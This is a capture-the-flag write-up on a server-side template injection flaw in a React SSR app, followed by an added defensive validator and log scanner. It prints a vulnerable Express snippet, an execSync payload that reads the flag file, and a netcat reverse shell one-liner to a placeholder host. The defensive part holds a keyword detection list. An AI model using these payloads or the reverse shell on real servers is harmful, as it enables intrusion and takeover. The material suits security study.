Category: Web Exploitation
Points: 400
Author: Saurabh Sharma
"The admin loves modern frameworks so much they decided to render user input on the server side using a distinctively vulnerable configuration. Can you pop a shell?"
We are presented with a simple React application. The source code reveals that it is using Server-Side Rendering (SSR).
Specifically, there is an endpoint that takes user input from the query string and renders it directly into the HTML template without proper sanitization.
// Vulnerable snippet (imports added here for context; assumed to be Express and React's server renderer)
const express = require('express');
const { renderToString } = require('react-dom/server');
const app = express();

app.get('/', (req, res) => {
  // `name` is taken straight from the query string with no validation
  const { name } = req.query;
  // the user-controlled value is rendered server-side
  const html = renderToString(<App greeting={name} />);
  // ...
});
However, digging deeper, we found that the application wasn't just rendering React components; it was also passing the value through a template engine that evaluated expressions.
We identified that the name parameter was being passed into a context where Node.js code execution was possible.
We crafted a payload to execute system commands.
require('child_process').execSync('cat /flag.txt').toString()
Encoding this payload and sending it via the query parameter allowed us to execute the command on the server.
/?name={{ require('child_process').execSync('cat /flag.txt').toString() }}
To get a full interactive shell, we used a standard reverse shell payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR-IP> <PORT> >/tmp/f
URL-encoded and sent through the same parameter, this gave us full access to the server.
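For the defensive side of the same bug, here is an added example (not part of the original writeup or the challenge code): a strict allowlist check for the `name` parameter, so template delimiters never reach the renderer, plus a scanner that flags the injection pattern in access-log lines. The log format, the function names and the sample lines are all constructed for this illustration.

```javascript
// Added example: validate the greeting name, and scan access logs for the
// template-injection shape seen in this challenge. Names and log format are
// hypothetical, not from the challenge application.

// Allow only what a greeting name legitimately needs (letters, spaces,
// apostrophes, hyphens) with a length cap. Rejecting anything else is safer
// than trying to "sanitise" template syntax out of the input.
function isValidGreetingName(name) {
  return typeof name === 'string' && /^[\p{L} '-]{1,64}$/u.test(name);
}

// Substrings that have no business in a greeting and match the payload
// shape from the writeup: template delimiters and Node require() calls.
const SUSPICIOUS = ['{{', '}}', 'require(', 'child_process', 'execSync', 'mkfifo'];

// Classify a request path by its decoded `name` query parameter.
function classifyRequestPath(path) {
  const url = new URL(path, 'http://localhost'); // base is a dummy for parsing
  const name = url.searchParams.get('name');     // percent-decoded for us
  if (name === null) return { suspicious: false, reason: 'no name parameter' };
  const hit = SUSPICIOUS.find((s) => name.includes(s));
  if (hit) return { suspicious: true, reason: `contains ${hit}` };
  if (!isValidGreetingName(name)) return { suspicious: true, reason: 'fails allowlist' };
  return { suspicious: false, reason: 'ok' };
}

// Parse lines in the constructed format `<ip> "GET <path>" <status>` and
// return only the suspicious ones.
function scanAccessLog(lines) {
  const re = /^(\S+) "GET (\S+)"/;
  return lines
    .map((line) => {
      const m = re.exec(line);
      return m ? { ip: m[1], ...classifyRequestPath(m[2]) } : null;
    })
    .filter((r) => r && r.suspicious);
}

// Constructed sample log: one benign request and one carrying the
// URL-encoded flag-reading payload from the writeup.
const SAMPLE_LOG = [
  '203.0.113.5 "GET /?name=Alice" 200',
  '198.51.100.7 "GET /?name=%7B%7B%20require(%27child_process%27).execSync(%27cat%20/flag.txt%27).toString()%20%7D%7D" 200',
];

console.log(scanAccessLog(SAMPLE_LOG));
```

The allowlist is the fix that matters; the log scan only catches payloads shaped like this one, so it is a detection aid, not a substitute for validating the input.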
Flag: HackHaul{R34c7_SSR_RCE_1s_Re4l}